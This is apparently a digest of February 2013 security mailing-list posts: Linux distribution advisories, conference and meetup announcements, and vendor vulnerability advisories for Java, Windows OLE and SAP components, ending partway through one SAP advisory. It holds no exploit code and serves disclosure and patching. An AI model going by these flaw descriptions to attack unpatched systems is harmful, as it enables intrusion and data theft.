[ MDVSA-2013:014 ] java-1.6.0-openjdk
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:014 http://www.mandriva.com/security/ ___ Package : java-1.6.0-openjdk Date: February 22, 2013 Affected: 2011., Enterprise Server 5.0 ___ Problem Description: Multiple security issues were identified and fixed in OpenJDK (icedtea6): * S8006446: Restrict MBeanServer access * S8006777: Improve TLS handling of invalid messages * S8007688: Blacklist known bad certificate * S7123519: problems with certification path * S8007393: Possible race condition after JDK-6664509 * S8007611: logging behavior in applet changed The updated packages provides icedtea6-1.11.8 which is not vulnerable to these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0169 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1486 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1487 http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-February/021998.html http://www.oracle.com/technetwork/topics/security/javacpufeb2013update-1905892.html ___ Updated Packages: Mandriva Linux 2011: 3179023a8cf53f17ca0050c35703cc28 2011/i586/java-1.6.0-openjdk-1.6.0.0-35.b24.3-mdv2011.0.i586.rpm 9471c08b29d7a4d6901960c777367574 2011/i586/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.3-mdv2011.0.i586.rpm 687b1956e7806fbe47828aeee46188b3 2011/i586/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.3-mdv2011.0.i586.rpm 0d81e2b7b5a5e9f9428ab7a719be7abc 2011/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.3-mdv2011.0.i586.rpm d32b01e41349bac4da35718a40bdd6cb 2011/i586/java-1.6.0-openjdk-src-1.6.0.0-35.b24.3-mdv2011.0.i586.rpm 49a829a64856f6bc51885d8006f79d75 2011/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.3.src.rpm Mandriva Linux 2011/X86_64: 5171945563212cc7a6b01c2a17232218 2011/x86_64/java-1.6.0-openjdk-1.6.0.0-35.b24.3-mdv2011.0.x86_64.rpm f4313ec1eff30e27d91efc289b2fd939 2011/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.3-mdv2011.0.x86_64.rpm feec4d3386d8e11d7c49cff7786cc5d9 2011/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.3-mdv2011.0.x86_64.rpm 452b39d7f18da0e420fc9097c1df99fb 2011/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.3-mdv2011.0.x86_64.rpm 76d722e635364036f3150b5d376b46f2 2011/x86_64/java-1.6.0-openjdk-src-1.6.0.0-35.b24.3-mdv2011.0.x86_64.rpm 49a829a64856f6bc51885d8006f79d75 2011/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.3.src.rpm Mandriva Enterprise Server 5: 0b169348da4539ef53a469ea65ec5c56 mes5/i586/java-1.6.0-openjdk-1.6.0.0-35.b24.3mdvmes5.2.i586.rpm 201893b40418745b61190a8709e291e3 mes5/i586/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.3mdvmes5.2.i586.rpm 0f6029a3cda961c2b5a44fb79f316538 mes5/i586/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.3mdvmes5.2.i586.rpm 048d4fa4a17bfbec63e93ca9c104dbdd mes5/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.3mdvmes5.2.i586.rpm 0e0fd0ec9602d4ce7135bb41a6c4c59c mes5/i586/java-1.6.0-openjdk-src-1.6.0.0-35.b24.3mdvmes5.2.i586.rpm 2b2f0e776cf37401bfd9d196fb439ed2 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.3mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: cc43bba28287a484e139a2f5c3265c83 mes5/x86_64/java-1.6.0-openjdk-1.6.0.0-35.b24.3mdvmes5.2.x86_64.rpm 47d5cb9ab24e66ded57d5a8bacf97a92 mes5/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.3mdvmes5.2.x86_64.rpm dd209687eb5c4be2d6cf96e98494cf97 mes5/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.3mdvmes5.2.x86_64.rpm b0442b7eeaa57cd5e508c616f5ebc35d mes5/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.3mdvmes5.2.x86_64.rpm de4a1380d9b65b189d1f0b5bcecf0b48 mes5/x86_64/java-1.6.0-openjdk-src-1.6.0.0-35.b24.3mdvmes5.2.x86_64.rpm 2b2f0e776cf37401bfd9d196fb439ed2 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.3mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11
[SECURITY] [DSA 2631-1] squid3 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2630-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso February 24, 2013 http://www.debian.org/security/faq - - Package: squid3 Vulnerability : denial of service Problem type : remote Debian-specific: no CVE ID : CVE-2012-5643 CVE-2013-0189 Debian Bug : 696187 Squid3, a fully featured Web proxy cache, is prone to a denial of service attack due to memory consumption caused by memory leaks in cachemgr.cgi: CVE-2012-5643 squid's cachemgr.cgi was vulnerable to excessive resource use. A remote attacker could exploit this flaw to perform a denial of service attack on the server and other hosted services. CVE-2013-0189 The original patch for CVE-2012-5643 was incomplete. A remote attacker still could exploit this flaw to perform a denial of service attack. For the stable distribution (squeeze), these problems have been fixed in version 3.1.6-1.2+squeeze3. For the testing distribution (wheezy), these problems have been fixed in version 3.1.20-2.1. For the unstable distribution (sid), these problems have been fixed in version 3.1.20-2.1. We recommend that you upgrade your squid3 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlEp8EUACgkQXm3vHE4uylqX2ACfVzLUYmz1xSlRJUcshNB/W6zv KpIAoOVRw++ez+vx95H+dgN9vYG3he5p =OrsC -END PGP SIGNATURE-
NoSuchCon CFP 2.0 / 15-17 May 2013 / Paris, France
*** PARENTAL ADVISORY: 100% technical content *** +--+ = = = NoSuchCon - CFP 2.0 = = = =** http://www.nosuchcon.org/#cfp ** = = = = 15-17 May 2013 / Paris / France = = = °--° -- + -- The US have the NSA, hackers have the NSC. --[ Synopsis: The first edition of the NoSuchCon conference will take place in Paris from May the 15th to May the 17th of 2013. NSC is the badass hardcore technical security conference. Of death. --[ Background: We think hacking is a science, not an art. It's largely the science of experimentation and self learning. Best effort is not enough anymore. The number of hackers reaching the level where they can actually discover things by themselves has never been so high. And at the same time, the signal-to-noise ratio in our traditional communication channels (IRC, mailing lists, conferences, informal gatherings...) has never been so low. So we though we might give it a shot: we're trying to build a 0% bullsh!t conference. It's tougher than one might expect, but with the help of many (see in particular the support from our hardcore Programming Committee of death), we are confident that passion will prevail and that we'll eventually learn something from each other :) If you're tired of people making money on your back by monetizing your research whenever you go to a conference, we have good news: we're 100% non-profit. We're also not affiliated with any .gov or .com or any other organization. We work hard at night. Our aim is to learn stuff. If this sounds a lot like your own life, we'd be happy to have you among us. It's also worth remembering that hacking is *not* a competition. As such, there is no winner or rockstar. All you'll find here is people experimenting and seeking truth in code and RFCs. Finally, we'd like to insist on respect. Respect among attendees of course, which goes without saying (we all share the same passion; let's not get into ego problems and instead let's learn from each other. You know deep inside yourself that even though *you* certainly did your part of hard work, there would be no computers or network without the help of many), but also for researchers who come over, often from very far away, to present months of late night work to their peers. This is why NSC is strictly single track: every talk that makes it in deserves to be attended to, and everyone deserves to be treated with equal esteem and respect. There's no such thing as a rockstar at NSC: if you're after fame and profit, we're sure you'll find many other places to go to these days. --[ Press people / Media / Media Analysts / Bloggers: NSC is not a top secret conference. You are welcome to come over and participate. NSC staff will do their best to make your job easier. Please, bear in mind that you'll have to comply with strict hacker ethics, particularly in terms of privacy, personality rights and respect the anonymity of people who do not want to appear in your publications: you cannot take pictures of people without their *prior* consent, and people do not *have to* answer to any question if they don't feel like it. --[ Venue: The NSC conference will be hosted in the French Communist Party's amazing headquarters. This astonishing building was designed by the recently deceased Brazilian architect Oscar Niemeyer. The address is: Espace Oscar Niemeyer - Siege du Parti Communiste 2 Place Colonel Fabien, 75019 Paris, France --[ Tickets/Pricing: Tickets will be available for sales within days via our main website. l33t sponsor ticket 1337 EUR Evil sponsor ticket 666 EUR Regular entrance ticket 300 EUR Regular online ticket 250 EUR Early bid ticket 2200 EUR before 2013/04/30 Early bid ticket 150 EUR before 2013/04/01 Student ticket 50 EUR (50 tickets available) --[ Quality: The aim of NSC is best summarized in 3 words: quality, quality and research. That, and hard work ! We believe that there is a place for quality independent security research disclosure. We think that this place should be run on a non-profit basis. We do our best to ensure that the chosen talks are of the upmost quality thanks to the highly respected security researchers who form our selection panel. As a result, we hope to deliver in a 3 days
[SE-2012-01] New security issues affecting Oracle's Java SE 7u15
Hello All, We had yet another look into Oracle's Java SE 7 software that was released by the company on Feb 19, 2013. As a result, we have discovered two new security issues (numbered 54 and 55), which when combined together can be successfully used to gain a complete Java security sandbox bypass in the environment of Java SE 7 Update 15 (1.7.0_15-b03). Following our Disclosure Policy [1], we provided Oracle with a brief technical description of the issues found along with a working Proof of Concept code that illustrates their impact. Both new issues are specific to Java SE 7 only. They allow to abuse the Reflection API in a particularly interesting way. Without going into further details, everything indicates that a ball is in Oracle's court. Again. Thank you. Best Regards Adam Gowdiak - Security Explorations http://www.security-explorations.com We bring security research to the new level - References: [1] Security Explorations - Disclosure Policy http://www.security-explorations.com/en/disclosure-policy.html
DC4420 - London DEFCON Tuesday 26th Feb 2013
Apologies for the late announcement... Tomorrow we have a particularly excellent line-up! Primary Speaker: Arron Finnon - Finux Tech Weekly Title: The OSNIF Project: NIDS/NIPS Testing and Auditing Synopsis: Yeah great, I know its not a silver bullet! NIPS/NIDS have issues, and that's putting it lightly. I've talked about their limitations for awhile, and I get either that's awesome or they've been done to death. The truth is, we achieved nothing in fixing the problem. We can moan about how rubbish they are, we can pretend it's not our problem, or we can start to address the situation. For too long we've moaned, we've made comments and done little to make them better. Vendors are making money off products we all know could be doing a better job. Here's a crazy idea, let's talk about the issues, why they suck, and this time actually do something! What is to be lost by trying something new? Let's accept they fail and instead, turn that frown upside down. This talk isn't an answer, it's a beginning. Looking at some of the common and uncommon issues faced in trying to make NIDS/NIPS better, and why we fail at finding solutions. I don't have all the answers, however I intend to answer one simple question; What is OSNIF? I intend to look at the current situation surrounding testing and assessing NIDS/NIPS and basically why it sucks. I'll also discuss the Open Source Network Intrusion Framework (OSNIF) project, which is a open group set up by people involved within IDS/IPS to put together a testing methodology for IPS/IDS. Sort of OWASP but for NIDS/NIPS ~~ Secondary Speaker: Adrian Hayter - Convergent Network Solutions Title: The dangers of black box devices. Or...just how many insecure IP cameras are out there? Synopsis: Last year a security vulnerability left hundreds of TRENDnet IP camera feeds exposed on the Internet, many of them broadcasting their owner's living rooms, or (even more disturbingly) children sleeping. One year on, and despite assurances from TRENDnet, a large number of feeds are still accessible. Over the last several months, I've hunted down the feeds of numerous types of camera and slowly built up an online viewer to illustrate the problem that these black box devices pose to uneducated users. This talk will give an overview of the processes involved in creating the viewer, as well as showcasing some of the more bizarre interesting feeds that are still broadcasting to this day. Venue is here: http://www.phoenixcavendishsquare.co.uk/ Full details: http://www.dc4420.org/ See you there! cheers, MM -- In DEFCON, we have no names... errr... well, we do... but silly ones...
VUPEN Security Research - Microsoft Windows OLE Automation Code Execution Vulnerability
VUPEN Security Research - Microsoft Windows OLE Automation Remote Code Execution Vulnerability Website : http://www.vupen.com Twitter : http://twitter.com/vupen I. BACKGROUND - Microsoft Windows is a series of software operating systems and graphical user interfaces produced by Microsoft. Windows had approximately 90% of the market share of the client operating systems. (Wikipedia) II. DESCRIPTION - VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Windows. The vulnerability is caused by an integer overflow error in the SysAllocStringLen() function within the Oleaut32.dll (Object Linking and Embedding Automation) library, which could allow remote attackers to execute arbitrary code via a specially crafted web page or Office document. CVSS Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) III. AFFECTED PRODUCTS --- Microsoft Windows XP Service Pack 3 IV. Binary Analysis Exploits/PoCs --- In-depth technical analysis of the vulnerability and a fully functional remote code execution exploit are available through the VUPEN BAE (Binary Analysis Exploits) portal: http://www.vupen.com/english/services/ba-index.php VUPEN Binary Analysis Exploits Service provides private exploits and in-depth technical analysis of the most significant public vulnerabilities based on disassembly, reverse engineering, protocol analysis, and code audit. The service allows governments and major corporations to evaluate risks, and protect infrastructures and assets against new threats. The service also allows security vendors (IPS, IDS, AntiVirus) to supplement their internal research efforts and quickly develop both vulnerability-based and exploit-based signatures to proactively protect their customers from attacks and emerging threats. V. VUPEN Threat Protection Program --- Governments and major corporations which are members of the VUPEN Threat Protection Program (TPP) have been proactively alerted about the vulnerability when it was discovered by VUPEN in advance of its public disclosure, and have received a detailed attack detection guidance to protect national and critical infrastructures against potential 0-day attacks exploiting this vulnerability: http://www.vupen.com/english/services/tpp-index.php VI. SOLUTION Apply MS13-020 security updates. VII. CREDIT -- This vulnerability was discovered by Nicolas Joly of VUPEN Security VIII. ABOUT VUPEN Security --- VUPEN is the leading provider of defensive and offensive cybersecurity intelligence and advanced vulnerability research. VUPEN solutions enable corporations and governments to manage risks, and protect critical networks and infrastructures against known and unknown vulnerabilities. VUPEN has been recognized as Company of the Year 2011 in the Vulnerability Research Market by Frost Sullivan. VUPEN solutions include: * VUPEN Binary Analysis Exploits Service (BAE) : http://www.vupen.com/english/services/ba-index.php * VUPEN Threat Protection Program (TPP) : http://www.vupen.com/english/services/tpp-index.php IX. REFERENCES -- http://technet.microsoft.com/en-us/security/bulletin/ms13-020 http://www.vupen.com/english/research.php X. DISCLOSURE TIMELINE - 2010-08-05 - Vulnerability Discovered by VUPEN and shared with customers 2013-02-12 - MS13-020 security bulletin released 2013-02-20 - Public disclosure
[SECURITY] [DSA 2629-1] openjpeg security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2629-1 secur...@debian.org http://www.debian.org/security/ Michael Gilbert February 25, 2013 http://www.debian.org/security/faq - - Package: openjpeg Vulnerability : several issues Problem type : local (remote) Debian-specific: no CVE ID : CVE-2009-5030 CVE-2012-3358 CVE-2012-3535 Debian Bug : 672455 681075 685970 CVE-2009-5030 Heap memory corruption leading to invalid free when processing certain Gray16 TIFF images. CVE-2012-3358 Huzaifa Sidhpurwala of the Red Hat Security Response Team found a heap-based buffer overflow in JPEG2000 image parsing. CVE-2012-3535 Huzaifa Sidhpurwala of the Red Hat Security Response Team found a heap-based buffer overflow when decoding JPEG2000 images. For the stable distribution (squeeze), these problems have been fixed in version 1.3+dfsg-4+squeeze1. For the testing (wheezy) and unstable (sid) distributions, these problems have been fixed in version 1.3+dfsg-4.6. We recommend that you upgrade your openjpeg packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlErtgkACgkQXm3vHE4uylo31gCgytYXqkTSxBvm0P3Odrzi8H5Z vEYAmwYgy02si53Cu26cnGNTNxZM8bgr =TxAK -END PGP SIGNATURE-
[Onapsis Security Advisory 2013-001] SAP Portal PDC Information Disclosure
Onapsis Security Advisory 2013-001: SAP Portal PDC Information Disclosure This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well asexclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, an internal or external attacker would be able perform attacks on the Organization's users through weaknesses in the SAP system. Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through the exploitation of vulnerabilities in their systems. Risk Level: Medium 2. Advisory Information === -- Public Release Date: 2013-02-21 -- Subscriber Notification Date: 2013-02-21 -- Last Revised: 2013-02-21 -- Security Advisory ID: ONAPSIS-2013-001 -- Onapsis SVS ID: N/A -- Researcher: Mariano Nunez -- Initial Base CVSS v2: 4.0 (AV:N/AC:L/AU:S/C:P/I:N/A:N) 3. Vulnerability Information -- Vendor: SAP -- Affected Components: * SAP Enterprise Portal (Check SAP Note 1658947 for detailed information on affected releases) -- Vulnerability Class: Information Disclosure -- Remotely Exploitable: Yes -- Locally Exploitable: No -- Authentication Required: No -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2013-001 4. Affected Components Description == SAP® Enterprise Portal (SAP® EP) unifies enterprise applications, information, and services from SAP and non-SAP sources into one system to support business processes, both within and across company boundaries. SAP Enterprise Portal is a building block of SAP NetWeaverTM – a total integration and application platform designed to unify and align people, information, and business processes across technologies and organizations. [1] [1] SAP BWP Portal Infrastructure 5. Vulnerability Details The SAP Portal “Federation” configuration pages do not properly handle authentication, exposing the entire Portal infrastructure. Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === SAP has released SAP Note 1658947 which provide patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1658947. Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == 2011-11-16: Onapsis provides vulnerability information to SAP. 2012-03-13: SAP releases security patches. 2013-02-21: Onapsis notifies availability of security advisory to security mailing lists. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit ? the Onapsis Research Labs ? has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis = Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks. Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities. Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over their SAP platform, helping them enforce compliance
[Onapsis Security Advisory 2013-002] SAP SDM Denial of Service
Onapsis Security Advisory 2013-002: SAP SDM Denial of Service This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well asexclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, an attacker would be able to perform a sabotage attack over the service used to deploy and change software components in the SAP AS Java. This would prevent legitimate developers and administrators from performing and maintain required business and technical activities. Risk Level: Medium 2. Advisory Information === -- Public Release Date: 2013-02-21 -- Subscriber Notification Date: 2013-02-21 -- Last Revised: 2013-02-21 -- Security Advisory ID: ONAPSIS-2013-002 -- Onapsis SVS ID: ONAPSIS-00042 -- Researcher: Mariano Nunez / Jordan Santarsieri -- Initial Base CVSS v2: 5.0 (AV:N/AC:L/AU:N/C:N/I:N/A:P) 3. Vulnerability Information -- Vendor: SAP -- Affected Components: * SAP J2EE SDM (Check SAP Note 1586419 for detailed information on affected releases) -- Vulnerability Class: Denial of Service -- Remotely Exploitable: Yes -- Locally Exploitable: No -- Authentication Required: No -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2013-002 4. Affected Components Description == The Software Deployment Manager (SDM) is the standard tool that you use to install J2EE components on the SAP J2EE Engine. The SDM is a client/server application. The SDM Server runs on the SAP J2EE Engine side. This server is started automatically with the J2EE Engine. A graphical user interface is available as a client. [1] [1] http://help.sap.com/saphelp_nw04/helpdata/en/63/2c4f65a54c4a4db1a3600397ae617f/content.htm 5. Vulnerability Details The SDM suffers from a design vulnerability, in the way it handles failed user authentication attempts, generating a Denial of Service condition if some conditions are met. This can be abused by a malicious attacker to disrupt this service. Additional technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === SAP has released SAP Note 1586419 which provide patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1586419. Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == 2011-01-24: Onapsis provides vulnerability information to SAP. 2011-08-09: SAP releases security patches. 2013-02-21: Onapsis notifies availability of security advisory to security mailing lists. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit ? the Onapsis Research Labs ? has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis = Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks. Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities. Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over
[Onapsis Security Advisory 2013-003] SAP Enterprise Portal Cross-Site-Scripting
Onapsis Security Advisory 2013-003: SAP Enterprise Portal Cross-Site-Scripting This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well asexclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, an internal or external attacker would be able perform attacks on the Organization's users through weaknesses in the SAP system. Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through complex social engineering attacks and/or exploit vulnerabilities in their systems in order to take control of them. Risk Level: Medium 2. Advisory Information === -- Public Release Date: 2013-02-21 -- Subscriber Notification Date: 2013-02-21 -- Last Revised: 2013-02-21 -- Security Advisory ID: ONAPSIS-2013-003 -- Onapsis SVS ID: ONAPSIS-00044 -- Researcher: Jordan Santarsieri -- Initial Base CVSS v2: 4.3 (AV:N/AC:M/AU:N/C:N/I:P/A:N) 3. Vulnerability Information -- Vendor: SAP -- Affected Components: * SAP Enterprise Portal (Check SAP Note 1589716 for detailed information on affected releases) -- Vulnerability Class: Cross-Site-Scripting -- Remotely Exploitable: Yes -- Locally Exploitable: No -- Authentication Required: No -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2013-003 4. Affected Components Description == SAP® Enterprise Portal (SAP® EP) unifies enterprise applications, information, and services from SAP and non-SAP sources into one system to support business processes, both within and across company boundaries. SAP Enterprise Portal is a building block of SAP NetWeaverTM – a total integration and application platform designed to unify and align people, information, and business processes across technologies and organizations . [1] [1] SAP BWP Portal Infrastructure 5. Vulnerability Details As the server does not perform a proper security validation on the input parameters, it is possible to inject DHTML code that would be rendered to the user accessing the link. Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === SAP has released SAP Note 1589716 which provide patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1589716. Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == 2011-03-09: Onapsis provides vulnerability information to SAP. 2011-11-08: SAP releases security patches. 2013-02-21: Onapsis notifies availability of security advisory to security mailing lists. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit ? the Onapsis Research Labs ? has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis = Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks. Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities. Our star product, Onapsis X1, enables our customers to perform automated Security
[Onapsis Security Advisory 2013-004] SAP J2EE Core Service Arbitrary File Access
Onapsis Security Advisory 2013-004: SAP J2EE Core Service Arbitrary File Access This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well asexclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, a remote unauthenticated attacker might be able to access or modify all the business information processed by the ERP system. This would result in the total compromise of the SAP infrastructure. Risk Level: Critical 2. Advisory Information === -- Public Release Date: 2013-02-21 -- Subscriber Notification Date: 2013-02-21 -- Last Revised: 2013-02-21 -- Security Advisory ID: ONAPSIS-2013-004 -- Onapsis SVS ID: ONAPSIS-00057 -- Researcher: Juan Perez-Etchegoyen -- Initial Base CVSS v2: 10 (AV:N/AC:L/AU:N/C:C/I:C/A:C) 3. Vulnerability Information -- Vendor: SAP -- Affected Components: * SAP J2EE Engine Core Services (Check SAP Note 1682613 for detailed information on affected releases) -- Vulnerability Class: Arbitrary File Read/Write -- Remotely Exploitable: Yes -- Locally Exploitable: No -- Authentication Required: No -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2013-004 4. Affected Components Description == SAP’s NetWeaver combines Java technologies with proven SAP programming models and technologies. With the Web Application Server, SAP offers a runtime environment for Web applications that can be written both in ABAP and in Java. A fully J2EE-compliant server has been integrated with the traditional SAP Web Application Server, providing fast connectivity between applications written in Java and ABAP[1]. [1] http://help.sap.com/saphelp_nw04/helpdata/en/e4/ece561ee654d3980df19b53a48cc1b/content.htm 5. Vulnerability Details The J2EE core services is a set of features exposed through different protocols. One of these services lacks of the proper authentication and authorization features, allowing a remote unauthenticated attacker to read and write any file, depending on the permissions of the SIDADM user. Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === SAP has released SAP Note 1682613 which provide patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1682613. Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == 2012-07-30: Onapsis provides vulnerability information to SAP A.G. 2012-07-31: SAP confirms reception of vulnerability submission. 2012-11-13: SAP releases security patches. 2013-02-21: Onapsis notifies availability of security advisory to security mailing lists. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit ? the Onapsis Research Labs ? has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis = Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks. Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities. Our star product,
[Onapsis Security Advisory 2013-006] SAP SMD Agent Code Injection
Onapsis Security Advisory 2013-006: SAP SMD Agent Code Injection This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well asexclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, a remote unauthenticated attacker might be able to access or modify all the business information processed by the ERP system. This would result in the total compromise of the SAP infrastructure. Risk Level: High 2. Advisory Information === -- Public Release Date: 2013-02-21 -- Subscriber Notification Date: 2013-02-21 -- Last Revised: 2013-02-21 -- Security Advisory ID: ONAPSIS-2013-006 -- Onapsis SVS ID: N/A -- Researcher: Juan Perez-Etchegoyen -- Initial Base CVSS v2: 7.5 (AV:N/AC:L/AU:N/C:P/I:P/A:P) 3. Vulnerability Information -- Vendor: SAP -- Affected Components: * SAP Solution Manager Diagnostics Agent (Check SAP Note 1774568 for detailed information on affected releases) -- Vulnerability Class: Abuse of Functionality -- Remotely Exploitable: Yes -- 